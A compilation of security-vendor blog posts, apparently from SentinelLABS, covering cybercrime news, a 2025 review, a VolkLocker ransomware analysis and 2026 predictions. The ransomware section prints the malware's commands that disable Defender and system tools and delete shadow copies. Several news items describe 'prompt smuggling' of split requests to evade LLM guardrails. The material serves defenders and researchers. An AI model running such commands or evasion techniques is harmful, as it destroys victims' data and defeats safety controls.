What sets this campaign apart is its use of a malicious kernel‑mode mini‑filter driver, ProjectConfiguration.sys, signed with a stolen or leaked digital certificate originally issued to Guangzhou Kingteller Technology Co., Ltd and valid between 2012 to 2015. Operating deep within the Windows kernel, the driver acts as a rootkit: evading static analysis by resolving kernel APIs at runtime, blocking file deletion and registry access, protecting injected processes, and deliberately interfering with Microsoft Defender by manipulating the WdFilter driver’s load order.

The driver ultimately injects two user‑mode payloads, including the updated ToneShell backdoor, which now features enhanced stealth capabilities. Changes also include a simplified host‑ID scheme, network traffic obfuscation using fake TLS headers, and remote administration capabilities such as file transfer and interactive shell access. Communication occurs over TCP port 443 to an attacker‑controlled infrastructure.

Researchers note this marks a clear evolution in G0129’s tactics, prioritizing kernel‑level persistence and evasion. As the payload operates almost entirely in memory, memory forensics becomes a critical detection method, alongside monitoring for indicators of compromise tied to the malicious driver and injected shellcode.

The Ugly | Hackers Steal $7M via Compromised Trust Wallet Chrome Extension

After a compromised update to the Trust Wallet Chrome extension went live over the holidays, approximately $7 million has been stolen from nearly 3,000 cryptocurrency wallets. The malicious version 2.68.0 contained a hidden JavaScript file called 4482.js that silently exfiltrated sensitive wallet data, including seed phrases, to an external server, api.metrics-trustwallet[.]com. Users immediately reported funds disappearing after simple wallet authorizations, prompting Trust Wallet to investigate and release a patched version 2.69. CEO Eowyn Chen confirmed the hack and assured users that the company would reimburse affected wallets.

Investigations indicate that attackers likely exploited a leaked Chrome Web Store API key to publish the malicious extension, bypassing Trust Wallet’s standard release procedures. In parallel, threat actors launched a phishing campaign using a Trust Wallet-branded site, fix-trustwallet[.]com, claiming to provide a “vulnerability fix”. Users who entered their seed phrases on the site immediately lost access to their wallets. WHOIS records suggest the phishing domain may be linked to the same actors behind the malicious extension.

Trust Wallet, a non-custodial cryptocurrency wallet acquired by Binance in 2018, emphasized that mobile-only users and other browser extension versions were not affected. The company has begun reimbursing victims after verifying wallet ownership, transaction hashes, and affected addresses, while warning users not to share private keys or seed phrases.

Security researchers noted the incident highlights significant risks in browser-based wallets and supply chain attacks, as malicious updates can gain privileged access to funds. Trust Wallet has suspended compromised API keys, reported the malicious domains to registrars, and continues monitoring for scams. Users are strongly advised to immediately update to version 2.69, only use official channels, and verify all communications to protect their crypto assets.

It’s that time of year where we re-visit the wins and challenges from 2025 in our special year-end edition of The Good, The Bad and the Ugly. Here are the biggest stories that defined the best, the worst, and the ugliest cybersecurity moments from this past year.

The Best

2025 has been a year of remarkable victories for law enforcement agencies worldwide, highlighting the power of cross-border coordination. From high-profile arrests to major asset seizures, authorities have steadily dismantled the infrastructure supporting criminal and state-aligned cyber actors.

In the last two weeks, Eurojust led a takedown of Ukrainian call centers defrauding Europeans of €10M and law enforcement seizing servers from E-Note crypto exchange laundering $70M through ransomware and account takeovers. Similarly, the arrest of Ukrainian national Victoria Dubranova for aiding Russian state-backed hacktivists, alongside Spanish authorities capturing a 19-year-old selling 64M stolen records, underscores the growing international effort to hold cybercriminals accountable.

Significant infrastructure disruptions further amplify these successes. Convictions of cybercriminals targeting sensitive systems, such as the prison sentence for the “evil twin” WiFi hacker and seizure of the Cryptomixer crypto mixer with €1.3B laundered since 2016, are tangible results in stopping large-scale fraud. Law enforcement groups also took on multifaceted approaches, combining legal action, sanctions, and operational disruption to arrest Russian and DPRK-related cybercriminals and place sanctions on bulletproof hosting providers and foreign actors.

Our joint guidance on bulletproof hosting providers highlights best practices to mitigate potential cybercriminal activity, including recommended actions that ISPs can implement to decrease the usefulness of BPH infrastructure. Learn more https://t.co/cGQpuLpBPP pic.twitter.com/tM55acfuQv

— CISA Cyber (@CISACyber) November 19, 2025

International coordination has also been key this year. Interpol’s massive operations across Africa, including Operation Serengeti 2.0 and Operation Red Card, led to the arrests of thousands of suspects and the seizure of tens of millions in stolen assets. Europol dismantled SIMCARTEL, a global SIM-box fraud network, seizing servers, SIM cards, crypto, and luxury vehicles, while coordinated actions targeted Diskstation ransomware gangs and hacktivist infrastructures. In parallel, DOJ and CISA-led operations disrupted high-value schemes, including Prince Group’s $15B romance scam and multiple ransomware networks, while releasing decryptors for Phobos and 8Base victims to provide tangible relief. Law enforcement also extended their reach to regulatory and infrastructure initiatives as well, introducing the Cyber Trust Mark certification for IoT devices and HIPAA encryption and MFA updates to ensure cyber safety from the top down.

On the cybersecurity innovation front, CISA’s launch of Thorium, an open-source platform to help government agencies automate forensic investigations, and AI-enabled threat detection systems have allowed authorities to act on incidents more rapidly, from ransomware affiliate seizures to monitoring AI misuse.

The Worst

State-sponsored crime, supply chain abuse, and emerging malware strains have collectively challenged defenders worldwide.

North Korea’s DPRK-linked hackers were prolific throughout 2025, stealing over $2B in cryptocurrency, blending traditional heists with espionage campaigns like Operation Contagious Interview targeting remote workers. Similarly, Iranian-linked UNK_SmudgedSerpent and China-linked TA415 campaigns leveraged phishing, fake platforms, and developer tooling to compromise high-value targets, from policy experts to enterprise networks.

2025 saw developer platforms, open-source ecosystems, and smart contracts become prime targets for threat actors. VS Code extensions like Bitcoin Black and Codo AI exfiltrated credentials from crypto wallets, while NPM packages such as XORIndex and os-info-checker-es6 delivered multi-stage payloads. Novel malware families including SleepyDuck RAT and Betruger backdoors emerged, masquerading as popular extensions on the Open VSX open-source registry and supporting ransomware campaigns, respectively. Even AI-powered attacks emerged, with AkiraBot, Gamma AI phishing, and social engineering campaigns bypassing CAPTCHAs and traditional defenses to exploit SMBs and enterprise targets.

This year, financial and operational impacts were particularly severe. Holiday banking fraud alone netted $262M via account takeovers exploiting phishing, MFA bypasses, and impersonation. YouTube trading bot scams, cloud identity theft campaigns, and multi-stage ransomware attacks like EncryptHub and Katz Stealer drained millions, targeting both enterprise systems and individuals. Exploits in misconfigured cloud resources and abandoned subdomains further amplified these risks, showing how minor misconfigurations can fuel sophisticated attacks.

State-aligned and nation-state threat actors also pursued espionage alongside financial crime. Fake job schemes and AI/crypto talent lures enabled targeted malware deployment, while advanced persistent threats like UNC3886 delivered stealthy backdoors to corporate and diplomatic networks. Malicious actors increasingly weaponized cloud services, messaging platforms, and developer tools, blurring the line between operational convenience and attack vectors.

The Ugliest

The “Ugly” dimension of 2025 was defined by AI-assisted attacks, zero-day exploitation, and ransomware industrialization, which amplified the scale and complexity of cybercrime. Large ransomware operations like CyberVolk resurfaced with AI-driven VolkLocker, automating negotiation, phishing, and multilingual attacks while leveraging Telegram for orchestration. AI also enhanced the capabilities of smaller, fragmented ransomware crews, allowing rapid targeting and payload deployment, though operational flaws sometimes limited effectiveness.

Zero-day vulnerabilities were actively exploited across critical infrastructure and enterprise platforms. React2Shell in React/Next.js, Triofox (CVE-2025-12480), Oracle E-Business Suite (CVE-2025-61884), and ToolShell in SharePoint permitted full system compromise, highlighting that popular frameworks and business-critical software remain high-value targets. Cloud and AI services were similarly exploited; EchoLeak and Google Gemini LLM prompt injections enabled exfiltration of sensitive information without user interaction. Attackers in all these cases demonstrated a capacity to combine stealth, automation, and sophisticated payloads for maximum disruption.

Update: See newly added info to our #ToolShell Alert. We’ve included info on ransomware deployment, new webshells involved in exploitation, & detection guidance https://t.co/Y37FHSeAL0 pic.twitter.com/C5aMXNOmAU

— CISA Cyber (@CISACyber) July 24, 2025

2025 also saw cyber espionage intertwined with physical and geopolitical threats. Iranian-backed Crimson Sandstorm leveraged cyber reconnaissance to support missile strikes, while Chinese and DPRK actors continue to target aid operations, humanitarian NGOs, and government infrastructure, often exploiting IoT, industrial control systems, or open-source software to do so. In cross-border campaigns, long-dwell malware like BRICKSTORM and protocol-level exploits such as MadeYouReset created cascading impacts across critical networks and infrastructure.

The risk factor in many attacks this year were amplified by third-party risks. Breaches of Discord vendors, Mixpanel, and GitHub Actions exposed vast quantities of PII and credentials, enabling subsequent ransomware, phishing, or espionage campaigns. The combination of AI, automation, and high-impact vulnerabilities exemplifies a cybercrime industrial complex, where opportunistic and state-aligned actors scale operations with unprecedented speed and sophistication.

Conclusion

As 2025 draws to a close, one thing is clear: Cybersecurity has become more interconnected, more consequential, and more dependent on collective responsibility than ever before. From supply chain fragility and identity-based intrusion to the continued convergence of cybercrime and geopolitics, the challenges ahead demand deeper collaboration, stronger accountability, and a more deliberate approach to trust across the digital ecosystem.

The Good | Authorities Dismantle Global Fraud Ring and Crypto Laundering Network

Eurojust officials have dismantled a transnational fraud ring running call centers in Ukraine that scammed European victims out of more than €10 million.

In collaboration with authorities from the Czech Republic, Latvia, Lithuania, and Ukraine, police arrested 12 suspects and conducted 72 searches across three Ukrainian cities, seizing vehicles, weapons, cash, computers, a polygraph machine, and forged IDs.

The network operated multiple call centers employing around 100 people and targeted more than 400 known victims. Scammers impersonated bank employees and police, claimed accounts were compromised, and coerced victims into transferring funds to “safe” accounts. Others used remote access software to steal credentials or collect cash in person.

Further seizures this week targeted the E-Note cryptocurrency exchange, dismantling its servers and domains after determining the service was used to launder more than $70 million in illicit funds. According to the DoJ, the proceeds stemmed largely from ransomware operations and account takeover attacks, routed through a global network of money mules.

The takedown was led by the FBI with support from German and Finnish authorities and Michigan State Police, with investigators confiscating multiple domains, mobile applications, backend servers, and customer databases containing transaction records.

Prosecutors have also unsealed an indictment against alleged operator Mykhalio Petrovich Chudnovets and are charging him with money laundering conspiracy. While no arrests have been made, Chudnovets faces up to 20 years in prison. Authorities say seized records may support further identifications and follow-on enforcement actions.

The Bad | North Korean Hackers Drive Record $2B Crypto Theft Surge in 2025

DPRK-linked threat actors drove a record surge in global cryptocurrency theft this year, claiming at least $2.02 billion of the $3.4 billion+ stolen worldwide between January and early December.

A new report delves into the 51% year-over-year increase, which marks the most severe year on record for DPRK-linked crypto crime while accounting for roughly 76% of all service compromises. Cumulatively, North Korean actors are now estimated to have stolen at least $6.75 billion in cryptocurrency.

A single incident, attributed to the TraderTraitor cluster, dominated the year: the February breach of Bybit that resulted in losses of approximately $1.5 billion. Beyond Bybit, DPRK-linked actors are also suspected in the theft of $36 million from South Korea’s most popular cryptocurrency exchange, Upbit.

These operations roll up into what is widely referred to as the Lazarus Group, a long-running threat actor tied to Pyongyang’s Reconnaissance General Bureau (RBG), which has historically blended large-scale crypto heists with espionage campaigns such as Contagious Interview, a campaign using fake recruitment-themed lures to deliver malware and harvest job applicant’s data.

In recent years, these state-backed actors have expanded tactics to include covert IT worker infiltration, sometimes via front companies, to gain privileged access at exchanges and Web3 firms – all to fund the regime despite international sanctions.

The growing scale of DPRK-linked crypto theft shows the profitability of high-value, state-backed operations, also incentivizing other actors to adopt similar tactics, including advanced laundering schemes, affiliate-based attacks, and cross-border exploitation.

For the broader ecosystem, North Korean threat operations continue to both normalize large-scale crypto heists and accelerate the professionalization of illicit networks, complicating attribution and straining global law enforcement resources.

The Ugly | Threat Actors Upscaling Abilities with Widespread Adoption of LLMs

Ransomware operations are undergoing a rapid, dangerous transformation not through novel “super-hacks” but via the industrialized efficiency of Large Language Models (LLMs). A new report by SentinelLABS assesses that LLMs have become a critical operational accelerator, compressing the ransomware lifecycle and dramatically lowering the barrier to entry for novice cybercriminals.

The researchers say that threat actors are now automating reconnaissance, generating localized phishing lures, and triaging massive datasets across language barriers with unprecedented speed and accuracy with the help of LLMs. Ransomware-as-a-Service operators are already claiming to offer AI-assisted tools to affiliates to increase attack productivity.

SentinelLABS says attackers are successfully evading commercial guardrails through “prompt smuggling”, a process by which malicious requests are broken down into innocent-looking pieces across multiple chats. The outputs are then stitched together offline to build working attack tools.

The researchers predict that top-tier actors will go further, likely migrating to self-hosted, open-source models like Ollama to entirely avoid provider guardrails. This evolution would allow criminals to operate without telemetry or censorship, effectively weaponizing unrestricted AI.

Real-world campaigns already illustrate this escalation. Anthropic has reported on tools like Claude Code being used to automate entire extortion chains, from technical reconnaissance to calculating optimal ransom demands. In other instances, malware such as QUIETVAULT has been seen hijacking a victim’s own locally installed LLMs to intelligently hunt for crypto-wallets and sensitive files.

While the report adds to the general industry concern around the use of AI by threat actors, it also debunks one of the wider myths in common circulation. The risk from today’s LLMs, the researchers say, isn’t superintelligent malware or novel attack vectors, it’s the more mundane industrialization of extortion with smarter target selection, tailored demands, and faster operational tempo, factors that increasingly complicate attribution and challenge defenders to adapt to a significantly higher-volume threat landscape.

The Good | U.S. & Spanish Officials Crack Down on Hacktivist & Identity Theft Activities

U.S. officials have charged Ukrainian national Victoria Dubranova for allegedly supporting Russian state-backed hacktivist groups in global critical infrastructure attacks. Extradited earlier this year, Dubranova faces trials in February and April 2026 tied to her suspected involvement in NoName057(16) and CyberArmyofRussia_Reborn (CARR), respectively.

GOT HER: A pro-Russian UKR hacker, Victoria Dubranova, has been arrested in a MASSIVE 99-count indictment for GRU-backed attacks on US water systems and food plants. She’s been extradited — and now there’s a $10M bounty on her GRU bosses! https://t.co/i31z4aXPMF pic.twitter.com/AAKeGQWx0K

— Chuck Pfarrer | Indications & Warnings | (@ChuckPfarrer) December 12, 2025

The indictment states that NoName057(16) operated as a state-sanctioned effort involving multiple threat actors and a government-created IT center. Their tooling includes a custom DDoS called ‘DDoSia’ used to launch attacks against government and financial agencies as well as critical transportation.

Prosecutors say Russia’s military intelligence service funded and directed CARR, a hacktivist group with over 75,000 Telegram followers and a long record of attacks. Damage to U.S. water systems, an ammonia leak at a Los Angeles facility, and targeting of nuclear and election infrastructure are all attributed to CARR. Dubranova faces up to 27 years on CARR-related charges and 5 years on NoName charges. Multi-million dollar rewards are in place for information on either threat group.

In Spain, authorities have arrested a 19-year-old hacker for the alleged theft and sale of 64 million records stolen from nine organizations. The suspect faces charges including cybercrime, unauthorized access, and privacy violations.

The investigation first started in June after breaches at the unnamed firms were reported. Police later confirmed that the suspect possessed millions of stolen records containing full names, addresses, emails, phone numbers, DNI numbers, and IBAN codes. He reportedly tried to sell the data on multiple forums using six accounts and five pseudonyms.

While officers have seized cryptocurrency wallets containing proceeds from the alleged sales, the total number of individuals affected remains unclear. Given the scale of the crime, Spanish authorities emphasize the seriousness of attempting to monetize stolen personal information.

The Bad | Malicious VS Code Extensions Deploy Stealthy Infostealer Malware

Two malicious Visual Studio Code extensions, Bitcoin Black and Codo AI, were recently discovered on Microsoft’s VS Code Marketplace, infecting developers with information-stealing malware. Each disguised as a harmless color theme and an AI coding assistant, the extensions were published under the alias ‘BigBlack’. While download counts are still low at the time of this writing, both packages point to a clear intent to compromise developer environments.

Researchers note that earlier versions of Bitcoin Black used a PowerShell script to fetch a password-protected payload, briefly flashing a visible window that could alert users. The latest version now has a hidden batch script that quietly downloads a DLL and executable via curl, significantly reducing detection risk. Meanwhile, Codo AI delivers legitimate code-completion via ChatGPT or DeepSeek but embeds a malicious payload alongside these features.

Both extensions deploy the Lightshot screenshot tool paired with a malicious DLL that uses DLL hijacking to load an infostealer called runtime.exe. Once executed, the malware creates a directory under %APPDATA%\Local\ and begins exfiltrating sensitive data from system details and clipboard content to WiFi passwords, screenshots, installed software lists, and running processes. Finally, it launches Chrome and Edge in headless mode to extract cookies and hijack active sessions, targeting several crypto wallets including Phantom, MetaMask, and Exodus.

Microsoft has since removed both extensions from the Marketplace and the malicious DLL is already flagged by 29 of 72 antivirus engines on VirusTotal. Developers are advised to install extensions only from trusted publishers and stay alert to atypical extension behavior.

The Ugly | CyberVolk Resurfaces With New Telegram-Powered RaaS ‘VolkLocker’

CyberVolk, a pro-Russia hacktivist persona first identified in late 2024, resurfaced this August with a revamped ransomware-as-a-service (RaaS) offering known as VolkLocker (CyberVolk 2.x). SentinelLABS reported this week that the group has pivoted to using Telegram for both automation and customer interaction; however, operations are being undercut by payloads that retain artifacts, allowing victims to recover their files.

VolkLocker is written in Golang and supports both Windows and Linux. Payloads are distributed largely unprotected, with RaaS operators instructed to use UPX for packing. Builders must supply key configuration values including a Bitcoin address, Telegram bot token ID, encryption deadline, file extension, and more.

On execution, the ransomware attempts privilege escalation via the “ms-settings” UAC bypass, performs system and VM checks, and enumerates drives for encryption. A dynamic HTML ransom note then displays a 48-hour countdown, while a separate enforcement timer corrupts the system if deadlines or decryption attempts fail.

Telegram serves as the backbone of the RaaS, offering operators an administrative panel, victim enumeration, broadcast messaging, and optional extensions such as RAT and keylogger control. Recent ads show CyberVolk expanding into standalone tooling with tiered pricing models.

The encryption routine uses AES-256 in GCM mode with a hardcoded master key. Crucially, the key is written in plaintext to a file in %TEMP%, alongside the victim’s unique identifier and the attacker’s Bitcoin address – an apparent leftover test artifact that allows victims to decrypt their own files.

Despite repeated account bans on Telegram, CyberVolk continues to evolve its services. The plaintext key flaw, however, reveals quality-control issues that limit the real-world impact of VolkLocker as-is. SentinelOne’s Singularity Platform detects and blocks behaviors and payloads linked to CyberVolk.

CyberVolk is a pro-Russia hacktivist persona we first documented in late 2024, tracking its use of multiple ransomware tools to conduct attacks aligned with Russian government interests. After seemingly lying dormant for most of 2025 due to Telegram enforcement actions, the group returned in August with a new RaaS offering called VolkLocker (aka CyberVolk 2.x).

In this post, we examine the functionality of VolkLocker, including its Telegram-based automation, encryption mechanisms, and affiliate features. Our analysis reveals an operation struggling with the challenges of expansion: taking one step forward with sophisticated Telegram automation, and one step backward with payloads that retain test artifacts enabling victim self-recovery.

Technical Details

VolkLocker payloads are written in Golang, with versions supporting both Linux and Windows. Base builds are shipped without obfuscation, and RaaS operators are encouraged to use UPX for packing rather than being offered native crypting or packing features as is common with many other RaaS offerings.

Operators building new VolkLocker payloads must provide a bitcoin address, Telegram bot token ID, Telegram chat ID, encryption deadline, desired file extension, and self-destruct options.

Upon launch, the ransomware checks its execution context and attempts privilege escalation if needed. Escalation uses the “ms-settings” UAC bypass technique (T1548.002), hijacking the HKCU\Software\Classes\ms-settings\shell\open\command registry key to execute with elevated privileges.

The malware performs environmental discovery and system enumeration, including process enumeration for virtual environment detection and hardware-based identification.

VolkLocker checks the local MAC address against known virtualization vendor prefixes. Registry locations associated with VirtualBox and VMware are also queried.

Once initialized, the ransomware enumerates all available drives (A: through Z:) and determines which files to encrypt based on exclusion lists for specific paths and extensions configured in the VolkLocker code.

Encryption Mechanism

VolkLocker uses AES-256 in GCM mode (Galois/Counter Mode) for file encryption. When the ransomware identifies a target file, it initializes an encryption engine using a 32-byte master key decoded from a 64-character hex string embedded in the binary.

For each file, the malware generates a random 12-byte nonce for the initialization vector using Golang’s crypto/rand package. The file is encrypted using the GCM Seal operation, which prepends the 12-byte nonce to the ciphertext and appends a 16-byte authentication tag. The original file is marked for deletion, and the encrypted file receives a custom extension (e.g., .locked, .cvolk).

Critical Design Flaw | Plaintext Key Backup

VolkLocker does not generate encryption keys dynamically. Instead, master keys are hardcoded as hex strings within the binaries. The same master key encrypts all files on a victim system.

Critically, this master key is also written to a plaintext file in the %TEMP% folder, creating a trivial decryption pathway for victims who discover it.

This design flaw exists in the backupMasterKey() function, which executes during initialization and performs the following:

• Constructs a file path at %TEMP%\system_backup.key (typically C:\Users\\AppData\Local\Temp\system_backup.key)
• Writes a plaintext file containing the victim’s unique identifier, the complete master encryption key, and the attacker’s Bitcoin address
• Applies Windows Hidden and System file attributes to obscure the file from casual directory listings
• The file format is:

  User: CV<16 hex characters>
  Key: <64 hex characters - THE MASTER KEY>
  BTC: <attacker's bitcoin address>
  

Since the ransomware never deletes this backup key file, victims could attempt file recovery by extracting the necessary values from the file.

The plaintext key backup likely represents a test artifact inadvertently shipped in production builds. CyberVolk operators may be unaware that affiliates are deploying builds with the backupMasterKey() function still embedded. Given that VolkLocker is a relatively new service, the presence of what appears to be debug functionality in live deployments suggests that the operation is struggling to maintain quality control while aggressively recruiting lesser-skilled affiliates.

System Lockdown & Persistence Features

VolkLocker modifies multiple registry keys to inhibit system recovery and analysis:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 4 /f

In addition, Windows Defender is targeted for termination via PowerShell:

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
sc config WinDefend start= disabled
net stop WinDefend /y

The malware also terminates processes associated with common analysis tools via taskkill.exe:

• processhacker.exe
• procexp.exe
• procexp64.exe
• taskmgr.exe

VolkLocker creates multiple identical copies of itself in various system locations to establish persistence:

    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\cvolk.exe
    %PUBLIC%\Documents\svchost.exe
    %SYSTEMDRIVE%\ProgramData\Microsoft\Network\wlanext.exe
    %TEMP%\WindowsUpdate.exe

Ransom Note and Countdown Timer

VolkLocker’s ransom note is a dynamic HTML application. The file cybervolk_ransom.html is written to %TEMP% and launched both after encryption completes and upon system startup. The ransom note displays a countdown timer with a default duration of 48 hours. The duration of the timer can be configured by the RaaS operators.

The JavaScript-based countdown timer is purely cosmetic. When it reaches zero, the triggerDestruction() function displays a shake animation and the message “ SYSTEM DESTROYED .”

However, a separate enforcement timer operates independently of the browser-based display.

This enforcement timer is synchronized with the system clock using Golang’s time.After() function. When it expires, it calls the SystemCorruptor() and DestroySystem() functions. The same destructive routine triggers if an incorrect decryption key is provided more than the configured maxAttempts value. The default is three times.

File & Backup Destruction Mechanism

During system destruction, VolkLocker deletes the following folders from the user profile:

• Documents
• Desktop
• Downloads
• Pictures

The malware also deletes Volume Shadow Copies:

vssadmin delete shadows /all /quiet

Finally, VolkLocker triggers a BSOD (Blue Screen of Death) after a 10-second delay by calling NtRaiseHardError() with a specific status code.

Telegram Integration

All aspects of the CyberVolk RaaS are managed through Telegram. Prospective customers and operational queries are directed to the main bot (CyberVolk_Kbot).

VolkLocker payloads include built-in Telegram automation for command and control. This aligns with CyberVolk’s operational model, where all communication, purchasing, and support occur through Telegram, a model the actors see as a “market differentiator”.

The default Telegram C2 supports the following commands:

The Telegram C2 is customizable. Some CyberVolk operators have published examples that include additional capabilities, such as keylogging control.

The telegramReporter() function alerts operators upon new infections, similar to Telegram-enabled infostealers. When a host is infected, basic system information and a screenshot are sent to the configured Telegram chat.

Expanded Services and Pricing

CyberVolk has expanded beyond ransomware. In November 2025, operators began advertising standalone RAT and keylogger tools, with the following advertised pricing model:

• RaaS (single OS): $800-$1,100 USD
• RaaS (Linux + Windows): $1,600-$2,200 USD
• Standalone RAT or Keylogger: $500 USD each

Intelligence suggests bundle discounts are available for customers purchasing multiple services.

Conclusion

Despite repeated Telegram account bans and channel removals throughout 2025, CyberVolk has reestablished its operations and expanded its service offerings.

However, storing master encryption keys in plaintext is a significant design blunder that undermines the ransomware’s effectiveness, allowing victims to recover files without acceding to the threat actor’s ransom demand.

Nevertheless, defenders should see CyberVolk’s adoption of Telegram-based automation as a reflection of broader trends among politically-motivated threat actors. These groups continue to lower barriers for ransomware deployment while operating on platforms that provide convenient infrastructure for criminal services.

The SentinelOne Singularity Endpoint Platform currently detects and prevents malicious behaviors and artifacts associated with CyberVolk Ransomware attacks.

Indicators of Compromise

CyberVolk (VolkLocker 2025) Linux
0948e75c94046f0893844e3b891556ea48188608

CyberVolk (VolkLocker 2025) Windows
dcd859e5b14657b733dfb0c22272b82623466321

Bitcoin Address
bc1qujgdzl0v82gh9pvmg3ftgnknl336ku26nnp0vy (CyberVolk)

Telegram Bot Token
8368663132:AAHBfe3xYPtg1IMynKhQy1BRzuF5UZRZspw (CyberVolk)

As we close out 2025 and look ahead to 2026, nothing is as we might have expected even a year ago. AI has disrupted, and will continue to disrupt, every corner of modern life. In threat intelligence, SentinelLABS has not only recognized this shift but actively pivoted to meet it. At the same time, geopolitical alignments have grown increasingly unstable, with long-standing relationships now less certain than ever.

How will these new realities shape enterprises’ ability to anticipate and counter the cyber threats forming on the horizon? Predictions always carry the caveat that the future remains intractably unknowable, but even the unexpected emerges from trajectories already in motion.

In this post, SentinelLABS researchers and leaders share their perspectives on how the cyber threat landscape is evolving and what may lie ahead. Read on to explore how developments in global strategy, organized cybercrime, and of course, AI could impact us all in the coming year.

The Forgiving Internet is Over

The cybersecurity industry has been living on borrowed time, and AI is about to call in the debt.

The effects of cyberattacks are not always immediately visible: sometimes they go by entirely unnoticed. That encourages a fundamental cybernetics problem, as there isn’t an obvious causal link between the levers available to defenders and the constraining effects imposed on attackers.

That broken loop can create a corrosive perception that what we do doesn’t have meaningful effects, which has allowed our industry to backslide into lowest-investment, compliance-checkbox territory.

Meanwhile, the feedback delay entails that just as exploitation can go unnoticed for years, technical debt sits dormant, unnoticed for prolonged stretches.

We are moving to a future where being vulnerable and being hacked are not two separate steps. Today, organizations run edge appliances riddled with a bottomless supply of weaponizable vulnerabilities and n-days, and yet they often come away uncompromised simply because no one has gotten around to them yet.

Consider Cl0p’s MOVEit campaign: nearly 2,800 organizations compromised, 96 million individuals’ data exposed and the group was still processing victims more than a year after the initial breach. Cl0p explicitly stated they leaked names slowly to avoid overwhelming their own negotiation capacity. The attack itself was automated, executed over a holiday weekend, largely complete before the patch dropped, but extortion is human work. That capacity bottleneck —the gap between what automation can compromise and what humans can monetize— is about to disappear.

The internet’s forgiveness is a function of attacker capacity, and AI is a capacity multiplier. When autonomous agents can probe, validate, and exploit at machine speed, the gap between vulnerable and compromised collapses. Without a countervailing investment in AI-native defense, that asymmetry becomes the defining feature of the landscape.

Attackers will harness AI as a force multiplier long before defenders do. Scrappy resourcefulness, clear financial incentives, and freedom from procurement cycles guarantee it.

The alignment discourse is a distraction. Local models on consumer hardware, unconstrained foreign providers, and enterprise no-retention deployments attest to this. The moment capable computer-use models run locally, guardrails become irrelevant. Anthropic’s recent disclosure of Chinese operators using Claude Code for autonomous intrusions is instructive: one operator hitting thirty targets with minimal human intervention. By their own account, model hallucinations did more to slow the attackers down than any guardrails.

If defenders can thank AI for anything, it will be a fundamental reassignment of value, a revamping of capacity, and a necessary reimagining of what’s possible.

Feeble attempts to conjure tens of thousands of competent practitioners out of thin air have clearly floundered. Thankfully, getting more bodies isn’t the only way to increase capacity anymore. AI offers exactly that. It invites us to revisit implicit ROI calculations we abandoned long ago. We can now reconsider activities that required human intervention but were deemed too incremental and repetitive to be consequential: processing every document in a breach disclosure, pre-processing logs at scale, reverse engineering tangential codebases to better understand malicious code. These were not impossible tasks; they were tasks we decided not to attempt. That calculus has changed.

However, we must be clear-eyed about what we are adopting. These systems are non-deterministic. We are integrating a new form of evaluative power that is commoditized and cheap but also largely outside our control. Their outputs need to be wrangled into predictably acceptable parameters. The organizations that operationalize AI effectively will be those that learn to harness uncertainty within acceptable bounds rather than pretend it doesn’t exist.

What the market is missing (and desperately requires) are organizations that function as step-down transformers: converting raw frontier capability into security outcomes. Frontier labs are racing toward general capability while treating security as one of several potential markets. The result is a gap between what models can theoretically accomplish and what defenders can reliably deploy. Someone must bridge that gap with products and services that translate commoditized evaluative power into deployable autonomy.

This means investment in experimentation to redefine security problems in terms of what AI can make tractable, improve, or solve without waiting for archaic vendors to catch up. The threat actor(s) using Claude Code to maximize their operational capability didn’t stumble into competence. They iterated, tested, and created a harness for ready deployment with the human as far out of the loop as possible. Defenders will need equivalent rigor.

The opportunity is real and sizable. Seizing it requires that security as a practice becomes AI-native. Organizations that treat AI as another line item will find themselves overwhelmed by an operational tempo they cannot match. Those who internalize it as a fundamental shift, on both sides of the adversarial line, have a chance to redefine the dynamics of the security space. The value generated in 2026 and beyond is entirely concentrated in filling that gap between frontier capability and operational deployment.
Juan Andres Guerrero-Saade (JAGS), Senior Technical Fellow and VP of Intelligence and Security Research, SentinelLABS

 

Hemispheric Crossfire | US–Venezuela Cyber Operations Drag in the Big Three

As of late 2025, Venezuela has already shifted from a chronic crisis to a genuine flashpoint. U.S. carrier groups and expanded maritime operations in the Caribbean, public talk of “closing” Venezuelan airspace, and speculation about regime‑change scenarios have raised the temperature dramatically. Caracas, for its part, is signaling a willingness to fight a long guerrilla struggle and “anarchize” the environment if the U.S. moves militarily. At the same time, Venezuela has deepened its alignment with Russia, Iran, and China, explicitly seeking security guarantees, capital, and military assistance from all three.

In such an environment, a realistic 2026 development is the partial exposure of U.S. offensive cyber and information operations targeting Venezuela. This doesn’t mean Hollywood‑style leaks of every covert program; it looks more like a mosaic of glimpses: A social media platform announces a takedown of coordinated inauthentic networks seeding narratives aimed at Venezuelan military factions and diaspora communities; A contractor leak reveals tooling used to profile Venezuelan officers, union leaders, and local elites; A regional report connects seemingly independent media outlets and meme sources back to U.S.-linked funding and infrastructure, blurring the line between strategic communications and covert influence.

None of this is unprecedented. Great powers all play in this space, but the political salience of Venezuela today means the blowback will be sharper and more public than usual.

